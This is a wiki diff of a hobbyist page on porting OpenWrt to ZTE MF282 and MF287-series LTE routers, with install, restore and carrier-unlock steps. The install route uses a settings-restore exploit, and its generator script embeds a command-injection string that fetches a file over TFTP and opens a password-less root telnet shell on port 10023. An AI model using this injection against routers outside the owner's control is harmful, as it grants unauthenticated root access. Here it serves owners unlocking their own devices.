Differences

This shows you the differences between two versions of the page.

--- projects:zte_mf28x [2023/06/01 10:33] – Andreas Böhler
+++ projects:zte_mf28x [2024/08/07 10:33] (current) – Andreas Böhler
@@ Line 1: / Line 1: @@
 ~~NOTOC~~
-====== OpenWrt on the ZTE MF282/MF287+ (DreiTube/HuiTube and DreiNeo) ======
+====== OpenWrt on the ZTE MF282/MF282+/MF287/MF287+/MF287Pro (DreiTube/HuiTube and DreiNeo) ======
-The ZTE MF282 aka 3 HuiTube / DreiTube and the ZTE MF287+ aka DreiNeo are both routers with integrated LTE modem, made exclusively for the network operator 3 in Austria. I ported OpenWrt to both devices and found an easy-to-use unlocking method for both devices.
+The ZTE MF282 aka 3 HuiTube / DreiTube and the ZTE MF287 series aka DreiNeo are both routers with integrated LTE modem, made exclusively for the network operator 3 in Austria. I ported OpenWrt to all devices of these series and found an easy-to-use unlocking method for them (with the exception of the MF282+).
 <WRAP round important 80%>
 Everything you do according to these instructions, you do on your own risk!
-If you came here only for carrier unlock, you will still need to run OpenWrt for performing the unlock. Once unlocked, you can restore back to stock.
 </WRAP>
-=== What about the 3Neo Router? ===
+The following models are supported by OpenWrt 23.05 and onwards:
+  * MF282
+  * MF287
+  * MF287+
+  * MF287Pro
-There is an older version called "3Neo" which is currently not supported. I ordered such a device and I will try to come up with an OpenWrt port for it as well.
+The only model that will not be backported is the MF282+ aka DreiTube.
 ===== ZTE MF282 =====
-The MF282 is supported by OpenWrt 23.x onwards. In order to install it, you need to disassemble the device, attach serial console and perform a few commands in the UART shell.
+The MF282 is supported by OpenWrt 23.05 onwards. In order to install it, you need to disassemble the device, attach serial console and perform a few commands in the UART shell.
 <WRAP round important 80%>
@@ Line 24: / Line 27: @@
 See the git commit at https://git.openwrt.org/?p=openwrt/openwrt.git;a=commit;h=590d1fd0e636f627bbfeb988909ec36cc5450a3b for installation instructions.
-===== ZTE MF287+ =====
+===== ZTE MF282+ =====
-The newer MF287+ is more powerful than the MF282 and features four Gigabit-ports, a quad-core CPU and a CAT12 LTE modem. Since it can be had for less than €10,- used, it is a bargain!
+This device has a completely different hardware. An OpenWrt port is available, but this device is not supported by OpenWrt 23.05. The modem is not Qualcomm-based but uses a Marvell PXA1827 module.
+The MF282+ can be identified by the model type "DreiTube" on the bottom. It is IPQ4019 based (so quite powerful) and most instructions of the MF287 series applies, including exploits and installation instructions.
+===== ZTE MF287 =====
+The newer MF287 series is more powerful than the MF282 and features four Gigabit-ports, a quad-core CPU and a CAT12 LTE modem. Since it can be had for less than €10,- used, it is a bargain!
+OpenWrt supports all models from 23.05 onwards.
 ==== Option 1: Install from OEM firmware ====
 You need an exploit to get access to the stock firmware. Prepare the following:
-  * TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well
+<WRAP round important 80%>
+**Required files**
   * Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version)
+  * exploit.dat from https://cloud.aboehler.at/index.php/s/GDixspLf4jgg8pT. Please use the password ''%%nzjmaBARoM%%''
+  * OpenWrt factory image - this is **not** listed in the table above. Please download it from [[https://firmware-selector.openwrt.org/]]
+</WRAP>
+Then do the following preparatory steps:
+  * Set up a TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well
   * Rename busybox to "telnetd" and put it to your TFTP root directory
-  * Download the exploit.dat from https://cloud.aboehler.at/index.php/s/GDixspLf4jgg8pT. Please use the password ''%%nzjmaBARoM%%''
+  * Put the OpenWrt **factory.bin** file to your TFTP directory as zte.bin
-  * Put the OpenWrt factory.bin file to your TFTP directory as zte.bin
   * Assign your computer the IP address 192.168.0.22
@@ Line 43: / Line 60: @@
   - Log in to the web interface of your router, go to settings restore and use the file "exploit.dat" as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart.
   - Watch your TFTP server serving the file "telnetd"
-  - Use a Telnet client and connect to 192.168.0.1
+  - Use a Telnet client and connect to 192.168.0.1 on port 10023
-  - Login as user "admin" and password "admin"
+  - You should be logged-in immediately, no need for a password
   - Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use ''%%scp%%'' from the router):
+<WRAP round important 80%>
+For the MF287 and MF287+, you need to replace ''%%mtdXX%%'' with ''%%mtd13%%'' and ''%%mtdblockXX%%'' with ''%%mtdblock13%%''!
+For the MF287Pro, you need to replace ''%%mtdXX%%'' with ''%%mtd17%%'' and ''%%mtdblockXX%%'' with ''%%mtdblock17%%''!
+</WRAP>
+<WRAP round important 80%>
+Please double-check the partition number by running ''%%cat /proc/mtd%%'' and looking for the line named ''%%rootfs%%''. Use this mtd number.
+</WRAP>
 <code>
 cd /tmp
 cat /dev/ubi0_0 > /tmp/ubi0_0
 cat /dev/ubi0_1 > /tmp/ubi0_1
-tftp -p -l /tmp/ubi0_0 192.168.0.22
+tftp -p -l /tmp/ubi0_0 -r ubi0_0 192.168.0.22
-tftp -p -l /tmp/ubi0_1 192.168.0.22
+tftp -p -l /tmp/ubi0_1 -r ubi0_1 192.168.0.22
 rm /tmp/ubi0*
 tftp -g -r zte.bin 192.168.0.22
 cat /proc/driver/sensor_id
-flash_erase /dev/mtd13 0 0
+flash_erase /dev/mtdXX 0 0
-dd if=zte.bin of=/dev/mtdblock13 bs=131072
+dd if=zte.bin of=/dev/mtdblockXX bs=131072
 reboot
 </code>
@@ Line 84: / Line 111: @@
 Make sure to take a backup of your partitions. There is no firmware download available.
 </WRAP>
-There is a pending PR for adding OpenWrt support to this device. Before it is accepted, you need to build from my personal github at https://github.com/andyboeh/openwrt/tree/zte_mf287plus
 ==== Restore stock ====
@@ Line 91: / Line 116: @@
 You need the two files ubi0_0 and ubi0_1 you downloaded during the installation of OpenWrt. If you are already running OpenWrt, you need to flash an initramfs version first - for this, simply install the -recovery.bin version using sysupgrade as usual.
-Once rebooted, transfer the files ubi0_0 and ubi0_1 to your router to /tmp. Then, run the following commands to restore back to stock - the "ls" command is used to get the sizes of kernel and rootfs. Replace $kernel_length by the value you got for ubi0_0 and $rootfs_size by the value you got for ubi0_1.
+Once rebooted, transfer the files ubi0_0 and ubi0_1 to your router to /tmp. Then, run the following commands to restore back to stock - the "ls" command is used to get the sizes of kernel and rootfs. Replace ''%%$kernel_length%%'' by the value you got for ubi0_0 and ''%%$rootfs_size%%'' by the value you got for ubi0_1.
+<WRAP round important 80%>
+Please double-check the partition number by running ''%%cat /proc/mtd%%'' and looking for the line named ''%%rootfs%%''. Use this mtd number. For the MF287Pro, this should be ''%%ubiattach -m 17%%''. For the MF287 and MF287+, this should be ''%%ubiattach -m 17%%''.
+</WRAP>
 <code>
 ls -l /tmp/ubi0*
-ubiattach -m 14
+ubiattach -m XX
 ubirmvol /dev/ubi0 -N kernel
 ubirmvol /dev/ubi0 -N rootfs
@@ Line 115: / Line 144: @@
 The required software is an open source utility to interact with Qualcomm modem chipsets, available at https://github.com/forth32/qtools
+<WRAP round important 80%>
+Unlocking does not work on the MF282+ aka DreiTube! The LTE module uses a completely different hardware architecture.
+</WRAP>
 ===== Procedure =====
+==== Option 1: Using OpenWrt and qtools ====
 NB: If you are already running OpenWrt, you can skip disassembly and download the initramfs build. However, you will have to install "qcommand", a static build will be available soon.
@@ Line 130: / Line 165: @@
 setenv serverip 192.168.1.100
 setenv ipaddr 192.168.1.1
-tftpboot 0x82000000 openwrt.bin
+tftpboot openwrt.bin
-bootm 0x82000000
+bootm
 </code>
   * After a few minutes, OpenWrt has started
-  * Run the following commands to carrier-unlock your device
+  * Continue with the unlocking section below.
+==== Option 2: Stock firmware and static build of qtools ====
+On the stock firmware, you can perform an unlock using the exploit described above for installing OpenWrt and use a static build of qtools:
+  * Perform the exploit and connect via telnet
+  * Download a static build of qcommand from https://www.lteforum.at/mobilfunk/dreineo-huitube-openwrt-und-carrier-unlock.21497/ (see attachments)
+  * Transfer the static build via telnet:
+<code>
+cd /tmp
+tftp -g -r qcommand 192.168.0.22
+chmod +x /tmp/qcommand
+</code>
+  * Continue with the unlock as described below
+==== Unlocking ====
+Use the ''%%qcommand%%'' utility to perform the unlock. You might need to prefix the command with ''%%/tmp/%%'' if you transferred the static utility to the stock firmware.
 <code>
 qcommand -e -c "c 27 40 1f 46 30 41 41"
-qcommand -e -c "c 4b aa 00 00 00"
 qcommand -e -c "c 29 02 00"
 </code>
-  * Wait a few minutes until the LTE modem has rebooted (watch the log by calling ''%%logread -f%%''. You will see a USB disconnect and later a USB connect
+  * Wait a few minutes until the LTE modem has rebooted (On OpenWrt, you can watch the log by calling ''%%logread -f%%''. You will see a USB disconnect and later a USB connect; You could also watch the signal LEDs on the top for indications of a modem reboot).
   * Disconnect power
@@ Line 153: / Line 205: @@
 </code>
-The command ''%%AT+ZSEC?%%'' display the state of the network lock. It should report ''%%ZSEC=3,0%%'' if the unlocking process was successful.
+The command ''%%AT+ZSEC?%%'' displays the state of the network lock. It should report ''%%ZSEC=3,0%%'' if the unlocking process was successful.
+On the stock firmware, it is sufficient to perform a manual network scan. Afterwards, it can be switched back to automatic.
 ===== More Details =====
 Should you require more details for any of the steps provided, please have a look at the excellent documentation in the OpenWrt Wiki at https://openwrt.org. If you're still not getting along, then this procedure is not for you.
-===== Exploit MF287+ in detail =====
+===== Exploit MF287 in detail =====
-The settings file of the MF287+ is obfuscated and encrypted. Fortunately, the algorithm isn't very complicated and could be easily decompiled using Ghidra. The following Python script creates the "exploit.dat" file as linked to above:
+The settings file of the MF287 is obfuscated and encrypted. Fortunately, the algorithm isn't very complicated and could be easily decompiled using Ghidra. The following Python script creates the "exploit.dat" file as linked to above:
 <code python [enable_line_numbers="true"]>
@@ Line 185: / Line 240: @@
             return False
-        exploit = ";zte_debug.sh 192.168.0.22 telnetd; sleep 3600\n"
+        exploit = ";zte_debug.sh 192.168.0.22 telnetd; /tmp/telnetd -l /bin/sh -p 10023; sleep 3600\n"           out = bytearray()
-        out = bytearray()
         for char in exploit:
             if char != '\n' or char != '\t' or char != '\0':